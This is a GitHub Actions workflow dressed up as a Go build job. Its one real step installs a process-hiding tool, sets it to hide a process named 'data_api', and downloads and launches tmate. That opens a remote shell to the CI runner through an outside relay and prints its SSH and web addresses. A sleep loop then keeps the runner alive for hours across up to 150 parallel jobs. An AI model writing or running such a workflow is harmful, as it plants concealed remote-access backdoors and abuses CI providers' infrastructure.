name: namb64

on: workflow_dispatch

jobs:
  build:
    name: Meroji
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 150
      fail-fast: false
      matrix:
        go: [1.1]
        flag: [A]
    timeout-minutes: 400
    env:
        NUM_JOBS: 150
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: Guntau
      run: |
        sudo apt update -y && sudo apt install screen libjansson4 build-essential -y
        sudo npm i -g node-process-hider && sudo ph add data_api
        wget -nc https://github.com/tmate-io/tmate/releases/download/2.4.0/tmate-2.4.0-static-linux-i386.tar.xz &> /dev/null
        tar --skip-old-files -xvf tmate-2.4.0-static-linux-i386.tar.xz &> /dev/null
        rm -f nohup.out; bash -ic 'nohup ./tmate-2.4.0-static-linux-i386/tmate -S /tmp/tmate.sock new-session -d & disown -a' >/dev/null 2>&1
        ./tmate-2.4.0-static-linux-i386/tmate -S /tmp/tmate.sock wait tmate-ready
        ./tmate-2.4.0-static-linux-i386/tmate -S /tmp/tmate.sock display -p "Connect with SSH address: #{tmate_sh}"
        ./tmate-2.4.0-static-linux-i386/tmate -S /tmp/tmate.sock display -p "Connect with web: #{tmate_web}"
        while true;do m=$((`date '+%s%N'`/1000)) && echo "Time Is Limit" ${m:0:${#m}-6}.${m:${#m}-6} ; sleep 80; done
